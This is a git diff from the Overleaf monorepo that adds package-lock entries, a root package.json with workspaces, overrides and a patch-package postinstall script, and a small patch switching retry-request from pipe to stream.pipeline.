"https://registry.npmjs.org/csv-stringify/-/csv-stringify-6.2.3.tgz", + "integrity": "sha512-4qGjUMwnlaRc00gc2jrIYh2w/h1fo25B0mTuY9K8fBiIgtmCX3LcgUbrEGViL98Ci4Se/F5LFEtu8k+dItJVZQ==" + }, + "services/web/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "services/web/node_modules/dom-helpers": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz", + "integrity": "sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.8.7", + "csstype": "^3.0.2" + } + }, + "services/web/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "services/web/node_modules/esmock": { + "version": "2.6.7", + "resolved": "https://registry.npmjs.org/esmock/-/esmock-2.6.7.tgz", + "integrity": "sha512-4DmjZ0qQIG+NQV1njHvWrua/cZEuJq56A3pSELT2BjNuol1aads7BluofCbLErdO41Ic1XCd2UMepVLpjL64YQ==", + "dev": true, + "engines": { + "node": ">=14.16.0" + } + }, + "services/web/node_modules/events": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/events/-/events-3.3.0.tgz", + "integrity": "sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q==", + "engines": { + "node": ">=0.8.x" + } + }, + "services/web/node_modules/exifr": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/exifr/-/exifr-7.1.3.tgz", + "integrity": "sha512-g/aje2noHivrRSLbAUtBPWFbxKdKhgj/xr1vATDdUXPOFYJlQ62Ft0oy+72V6XLIpDJfHs6gXLbBLAolqOXYRw==", + "dev": true + }, + "services/web/node_modules/fetch-mock": { + "version": "12.5.2", + "resolved": "https://registry.npmjs.org/fetch-mock/-/fetch-mock-12.5.2.tgz", + "integrity": "sha512-b5KGDFmdmado2MPQjZl6ix3dAG3iwCitb0XQwN72y2s9VnWZ3ObaGNy+bkpm1390foiLDybdJ7yjRGKD36kATw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/glob-to-regexp": "^0.4.4", + "dequal": "^2.0.3", + "glob-to-regexp": "^0.4.1", + "regexparam": "^3.0.0" + }, + "engines": { + "node": ">=18.11.0" + } + }, + "services/web/node_modules/google-auth-library": { + "version": "8.7.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.7.0.tgz", + "integrity": "sha512-1M0NG5VDIvJZEnstHbRdckLZESoJwguinwN8Dhae0j2ZKIQFIV63zxm6Fo6nM4xkgqUr2bbMtV5Dgo+Hy6oo0Q==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.0.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/google-auth-library/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "services/web/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": "^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/helmet": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/helmet/-/helmet-6.0.1.tgz", + "integrity": "sha512-8wo+VdQhTMVBMCITYZaGTbE4lvlthelPYSvoyNvk4RECTmrVjMerp9RfUOQXZWLvCcAn1pKj7ZRxK4lI9Alrcw==", + "engines": { + "node": ">=14.0.0" + } + }, + "services/web/node_modules/https-proxy-agent": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz", + "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==", + "license": "MIT", + "dependencies": { + "agent-base": "^7.1.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "services/web/node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "services/web/node_modules/isarray": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-0.0.1.tgz", + "integrity": "sha512-D2S+3GLxWH+uhrNEcoh/fnmYeP8E8/zHl644d/jdA0g2uyXvy3sb0qxotE+ne0LtccHknQzWwZEzhak7oJ0COQ==", + "dev": true + }, + "services/web/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" + }, + "services/web/node_modules/lolex": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/lolex/-/lolex-4.2.0.tgz", + "integrity": "sha512-gKO5uExCXvSm6zbF562EvM+rd1kQDnB9AZBbiQVzf1ZmdDpxUSvpnAaVOP83N/31mRK8Ml8/VE8DMvsAZQ+7wg==", + "dev": true + }, + "services/web/node_modules/lru-cache": { + "version": "7.10.1", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-7.10.1.tgz", + "integrity": "sha512-BQuhQxPuRl79J5zSXRP+uNzPOyZw2oFI9JLRQ80XswSvg21KMKNtQza9eF42rfI/3Z40RvzBdXgziEkudzjo8A==", + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/memoize-one": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/memoize-one/-/memoize-one-6.0.0.tgz", + "integrity": "sha512-rkpe71W0N0c0Xz6QD0eJETuWAJGnJ9afsl1srmwPrI+yBCkge5EycXXbYRyvL29zZVUWQCY7InPRCv3GDXuZNw==", + "dev": true + }, + "services/web/node_modules/method-override": { + "version": "2.3.10", + "resolved": "https://registry.npmjs.org/method-override/-/method-override-2.3.10.tgz", + "integrity": "sha1-49r41d7hDdLc59SuiNYrvud0drQ=", + "dependencies": { + "debug": "2.6.9", + "methods": "~1.1.2", + "parseurl": "~1.3.2", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "services/web/node_modules/method-override/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "services/web/node_modules/method-override/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "services/web/node_modules/minimatch": { + "version": "7.4.2", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-7.4.2.tgz", + "integrity": "sha512-xy4q7wou3vUoC9k1xGTXc+awNdGaGVHtFUaey8tiX4H1QRc04DZ/rmDFwNm2EBsuYEhAZ6SgMmYf3InGY6OauA==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "services/web/node_modules/multer": { + "version": "1.4.5-lts.1", + "resolved": "git+ssh://git@github.com/overleaf/multer.git#e1df247fbf8e7590520d20ae3601eaef9f3d2e9e", + "integrity": "sha512-3fJSnWF3iBZJ6Z9y8AjFVY+O4DUKspxSnzXidb3zCKqBYyEKRrpGp7OXjT9th2gWPd+9u64ZyRWUf+YRYn1GCw==", + "license": "MIT", + "dependencies": { + "append-field": "^1.0.0", + "busboy": "^1.0.0", + "concat-stream": "^1.5.2", + "mkdirp": "^0.5.4", + "object-assign": "^4.1.1", + "type-is": "^1.6.4", + "xtend": "^4.0.0" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "services/web/node_modules/nanoid": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-4.0.2.tgz", + "integrity": "sha512-7ZtY5KTCNheRGfEFxnedV5zFiORN1+Y1N6zvPTnHQd8ENUvfaDBeuJDZb2bN/oXwXxu3qkTXDzy57W5vAmDTBw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "bin": { + "nanoid": "bin/nanoid.js" + }, + "engines": { + "node": "^14 || ^16 || >=18" + } + }, + "services/web/node_modules/nise": { + "version": "1.5.3", + "resolved": "https://registry.npmjs.org/nise/-/nise-1.5.3.tgz", + "integrity": "sha512-Ymbac/94xeIrMf59REBPOv0thr+CJVFMhrlAkW/gjCIE58BGQdCj0x7KRCb3yz+Ga2Rz3E9XXSvUyyxqqhjQAQ==", + "dev": true, + "dependencies": { + "@sinonjs/formatio": "^3.2.1", + "@sinonjs/text-encoding": "^0.7.1", + "just-extend": "^4.0.2", + "lolex": "^5.0.1", + "path-to-regexp": "^1.7.0" + } + }, + "services/web/node_modules/nise/node_modules/lolex": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/lolex/-/lolex-5.1.2.tgz", + "integrity": "sha512-h4hmjAvHTmd+25JSwrtTIuwbKdwg5NzZVRMLn9saij4SZaepCrTCxPr35H/3bjwfMJtN+t3CX8672UIkglz28A==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.0" + } + }, + "services/web/node_modules/nock": { + "version": "13.5.6", + "resolved": "https://registry.npmjs.org/nock/-/nock-13.5.6.tgz", + "integrity": "sha512-o2zOYiCpzRqSzPj0Zt/dQ/DqZeYoaQ7TUonc/xUPjCGl9WeHpNbxgVvOquXYAaJzI0M9BXV3HTzG0p8IUAbBTQ==", + "dev": true, + "dependencies": { + "debug": "^4.1.0", + "json-stringify-safe": "^5.0.1", + "propagate": "^2.0.0" + }, + "engines": { + "node": ">= 10.13" + } + }, + "services/web/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/web/node_modules/p-retry": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/p-retry/-/p-retry-6.2.0.tgz", + "integrity": "sha512-JA6nkq6hKyWLLasXQXUrO4z8BUZGUt/LjlJxx8Gb2+2ntodU/SS63YZ8b0LUTbQ8ZB9iwOfhEPhg4ykKnn2KsA==", + "dev": true, + "dependencies": { + "@types/retry": "0.12.2", + "is-network-error": "^1.0.0", + "retry": "^0.13.1" + }, + "engines": { + "node": ">=16.17" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/web/node_modules/path-to-regexp": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-1.9.0.tgz", + "integrity": "sha512-xIp7/apCFJuUHdDLWe8O1HIkb0kQrOMb/0u6FXQjemHn/ii5LrIzU6bdECnsiTF/GjZkMEKg1xdiZwNqDYlZ6g==", + "dev": true, + "dependencies": { + "isarray": "0.0.1" + } + }, + "services/web/node_modules/preact": { + "version": "10.19.3", + "resolved": "https://registry.npmjs.org/preact/-/preact-10.19.3.tgz", + "integrity": "sha512-nHHTeFVBTHRGxJXKkKu5hT8C/YWBkPso4/Gad6xuj5dbptt9iF9NZr9pHbPhBrnT2klheu7mHTxTZ/LjwJiEiQ==", + "dev": true, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/preact" + } + }, + "services/web/node_modules/react-bootstrap-5": { + "name": "react-bootstrap", + "version": "2.10.5", + "resolved": "https://registry.npmjs.org/react-bootstrap/-/react-bootstrap-2.10.5.tgz", + "integrity": "sha512-XueAOEn64RRkZ0s6yzUTdpFtdUXs5L5491QU//8ZcODKJNDLt/r01tNyriZccjgRImH1REynUc9pqjiRMpDLWQ==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.24.7", + "@restart/hooks": "^0.4.9", + "@restart/ui": "^1.6.9", + "@types/react-transition-group": "^4.4.6", + "classnames": "^2.3.2", + "dom-helpers": "^5.2.1", + "invariant": "^2.2.4", + "prop-types": "^15.8.1", + "prop-types-extra": "^1.1.0", + "react-transition-group": "^4.4.5", + "uncontrollable": "^7.2.1", + "warning": "^4.0.3" + }, + "peerDependencies": { + "@types/react": ">=16.14.8", + "react": ">=16.14.0", + "react-dom": ">=16.14.0" + }, + "peerDependenciesMeta": { + "@types/react": { + "optional": true + } + } + }, + "services/web/node_modules/react-bootstrap-5/node_modules/react-transition-group": { + "version": "4.4.5", + "resolved": "https://registry.npmjs.org/react-transition-group/-/react-transition-group-4.4.5.tgz", + "integrity": "sha512-pZcd1MCJoiKiBR2NRxeCRg13uCXbydPnmB4EOeRrY7480qNWO8IIgQG6zlDkm6uRMsURXPuKq0GWtiM59a5Q6g==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.5.5", + "dom-helpers": "^5.0.1", + "loose-envify": "^1.4.0", + "prop-types": "^15.6.2" + }, + "peerDependencies": { + "react": ">=16.6.0", + "react-dom": ">=16.6.0" + } + }, + "services/web/node_modules/regenerator-runtime": { + "version": "0.14.1", + "resolved": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.14.1.tgz", + "integrity": "sha512-dYnhHh0nJoMfnkZs6GmmhFknAGRrLznOu5nc9ML+EJxGvrx6H7teuevqVqCuPcPK//3eDrrjQhehXVx9cnkGdw==", + "dev": true + }, + "services/web/node_modules/retry-request": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-5.0.2.tgz", + "integrity": "sha512-wfI3pk7EE80lCIXprqh7ym48IHYdwmAAzESdbU8Q9l7pnRCk9LEhpbOTNKjz6FARLm/Bl5m+4F0ABxOkYUujSQ==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/sandboxed-module": { + "version": "2.3.0", + "resolved": "git+ssh://git@github.com/overleaf/node-sandboxed-module.git#cafa2d60f17ce75cc023e6f296eb8de79d92d35d", + "integrity": "sha512-ZNZDUOzXHKWBvxoRKm1ETmOBxEMrxn6iEgF3G8Ws7pgdNY18t3MIfnMmMGdDcF3//bp6VGgSXa+Gnpcovf/K3w==", + "dev": true, + "license": "MIT", + "dependencies": { + "require-like": "0.1.2", + "stack-trace": "0.0.10" + } + }, + "services/web/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "services/web/node_modules/sinon": { + "version": "7.5.0", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-7.5.0.tgz", + "integrity": "sha512-AoD0oJWerp0/rY9czP/D6hDTTUYGpObhZjMpd7Cl/A6+j0xBE+ayL/ldfggkBXUs0IkvIiM1ljM8+WkOc5k78Q==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.4.0", + "@sinonjs/formatio": "^3.2.1", + "@sinonjs/samsam": "^3.3.3", + "diff": "^3.5.0", + "lolex": "^4.2.0", + "nise": "^1.5.2", + "supports-color": "^5.5.0" + } + }, + "services/web/node_modules/sinon-mongoose": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/sinon-mongoose/-/sinon-mongoose-2.3.0.tgz", + "integrity": "sha512-d0rrL53wuDDs91GMCFAvQam64IpdVfkaxA4cGLTZfw1d5tTg6+F/D7F080d1n3d1gSHJBZLUf9pGpijC/x7xKQ==", + "dev": true, + "peerDependencies": { + "sinon": "5 - 7" + } + }, + "services/web/node_modules/sinon/node_modules/diff": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/diff/-/diff-3.5.0.tgz", + "integrity": "sha512-A46qtFgd+g7pDZinpnwiRJtxbC1hpgf0uzP3iG89scHk0AUC7A1TGxf5OiiOUv/JMZR8GOt8hL900hV0bOy5xA==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/web/node_modules/sinon/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha1-tdRU3CGZriJWmfNGfloH87lVuv0=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "services/web/node_modules/sinon/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dev": true, + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "services/web/node_modules/stack-trace": { + "version": "0.0.10", + "resolved": "https://registry.npmjs.org/stack-trace/-/stack-trace-0.0.10.tgz", + "integrity": "sha1-VHxws0fo0ytOEI6hoqFZ5f3eGcA=", + "dev": true, + "engines": { + "node": "*" + } + }, + "services/web/node_modules/stream-transform": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/stream-transform/-/stream-transform-3.2.1.tgz", + "integrity": "sha512-ApK+WTJ5bCOf0A2tlec1qhvr8bGEBM/sgXXB7mysdCYgZJO5DZeaV3h3G+g0HnAQ372P5IhiGqnW29zoLOfTzQ==" + }, + "services/web/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/teeny-request": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-8.0.2.tgz", + "integrity": "sha512-34pe0a4zASseXZCKdeTiIZqSKA8ETHb1EwItZr01PAR3CLPojeAKgSjzeNS4373gi59hNulyDrPKEbh2zO9sCg==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/teeny-request/node_modules/agent-base": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "license": "MIT", + "dependencies": { + "debug": "4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "services/web/node_modules/teeny-request/node_modules/https-proxy-agent": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", + "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "license": "MIT", + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "services/web/node_modules/terser-webpack-plugin": { + "version": "5.3.11", + "resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.3.11.tgz", + "integrity": "sha512-RVCsMfuD0+cTt3EwX8hSl2Ks56EbFHWmhluwcqoPKtBnfjiT6olaq7PRIRfhyU8nnC2MrnDrBLfrD/RGE+cVXQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.25", + "jest-worker": "^27.4.5", + "schema-utils": "^4.3.0", + "serialize-javascript": "^6.0.2", + "terser": "^5.31.1" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.1.0" + }, + "peerDependenciesMeta": { + "@swc/core": { + "optional": true + }, + "esbuild": { + "optional": true + }, + "uglify-js": { + "optional": true + } + } + }, + "services/web/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "services/web/node_modules/warning": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/warning/-/warning-4.0.3.tgz", + "integrity": "sha512-rpJyN222KWIvHJ/F53XSZv0Zl/accqHR8et1kpaMTD/fLCRxtV8iX8czMzY7sVZupTI3zcUTg8eycS2kNF9l6w==", + "dev": true, + "dependencies": { + "loose-envify": "^1.0.0" + } + }, + "services/web/node_modules/xml-crypto": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/xml-crypto/-/xml-crypto-2.1.6.tgz", + "integrity": "sha512-jjvpO8vHNV8QFhW5bMypP+k4BjBqHe/HrpIwpPcdUnUTIJakSIuN96o3Sdah4tKu2z64kM/JHEH8iEHGCc6Gyw==", + "license": "MIT", + "dependencies": { + "@xmldom/xmldom": "^0.7.9", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/web/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "license": "MIT", + "engines": { + "node": ">=0.6.0" + } + }, + "services/web/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "tools/saas-e2e": { + "name": "@overleaf/saas-e2e", + "devDependencies": { + "@isomorphic-git/lightning-fs": "^4.6.0", + "@testing-library/cypress": "^10.0.1", + "@types/adm-zip": "^0.5.5", + "@types/pdf-parse": "^1.1.4", + "@types/uuid": "^9.0.8", + "adm-zip": "^0.5.12", + "cypress": "13.13.2", + "isomorphic-git": "^1.25.10", + "mailtrap": "^3.4.0", + "pdf-parse": "^1.1.1", + "typescript": "^5.0.4", + "uuid": "^9.0.1" + } + }, + "tools/saas-e2e/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "dev": true, + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + } + } +} diff --git a/package.json b/package.json new file mode 100644 index 0000000..7dc9a63 --- /dev/null +++ b/package.json @@ -0,0 +1,80 @@ +{ + "name": "overleaf", + "private": true, + "dependencies": { + "patch-package": "^8.0.0" + }, + "devDependencies": { + "@types/chai": "^4.3.0", + "@types/chai-as-promised": "^7.1.8", + "@types/mocha": "^10.0.6", + "@typescript-eslint/eslint-plugin": "^8.0.0", + "@typescript-eslint/parser": "^8.0.0", + "eslint": "^8.15.0", + "eslint-config-prettier": "^8.5.0", + "eslint-config-standard": "^17.0.0", + "eslint-plugin-chai-expect": "^3.0.0", + "eslint-plugin-chai-friendly": "^0.7.2", + "eslint-plugin-cypress": "^2.15.1", + "eslint-plugin-import": "^2.26.0", + "eslint-plugin-mocha": "^10.1.0", + "eslint-plugin-node": "^11.1.0", + "eslint-plugin-prettier": "^4.0.0", + "eslint-plugin-promise": "^6.0.0", + "eslint-plugin-unicorn": "^56.0.0", + "prettier": "3.3.3", + "typescript": "^5.5.4" + }, + "overrides": { + "cross-env": { + "cross-spawn": "^7.0.6" + }, + "fetch-mock": { + "path-to-regexp": "3.3.0" + }, + "google-gax": { + "protobufjs": "^7.2.5" + }, + "swagger-tools": { + "body-parser": "1.20.3", + "multer": "1.4.5-lts.1", + "path-to-regexp": "3.3.0", + "qs": "6.13.0" + } + }, + "scripts": { + "format": "prettier --list-different $PWD/'**/*.js'", + "format:fix": "prettier --write $PWD/'**/*.js'", + "lint": "eslint --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix .", + "postinstall": "patch-package" + }, + "workspaces": [ + "jobs/mirror-documentation", + "libraries/*", + "services/analytics", + "services/chat", + "services/clsi", + "services/clsi-cache", + "services/clsi-perf", + "services/contacts", + "services/docstore", + "services/document-updater", + "services/filestore", + "services/freegeoip", + "services/github-sync", + "services/history-v1", + "services/idp", + "services/latexqc", + "services/notifications", + "services/project-history", + "services/real-time", + "services/references", + "services/templates", + "services/third-party-datastore", + "services/third-party-references", + "services/tpdsworker", + "services/web", + "tools/saas-e2e" + ] +} diff --git a/patches/@google-cloud+storage++retry-request+5.0.2.patch b/patches/@google-cloud+storage++retry-request+5.0.2.patch new file mode 100644 index 0000000..bbf8a8f --- /dev/null +++ b/patches/@google-cloud+storage++retry-request+5.0.2.patch @@ -0,0 +1,30 @@ +diff --git a/node_modules/@google-cloud/storage/node_modules/retry-request/index.js b/node_modules/@google-cloud/storage/node_modules/retry-request/index.js +index a293298..df21af6 100644 +--- a/node_modules/@google-cloud/storage/node_modules/retry-request/index.js ++++ b/node_modules/@google-cloud/storage/node_modules/retry-request/index.js +@@ -1,6 +1,6 @@ + 'use strict'; + +-const {PassThrough} = require('stream'); ++const { PassThrough, pipeline } = require('stream'); + const debug = require('debug')('retry-request'); + const extend = require('extend'); + +@@ -166,7 +166,7 @@ function retryRequest(requestOpts, opts, callback) { + }) + .on('complete', retryStream.emit.bind(retryStream, 'complete')); + +- requestStream.pipe(delayStream); ++ pipeline(requestStream, delayStream, () => {}); + } else { + activeRequest = opts.request(requestOpts, onResponse); + } 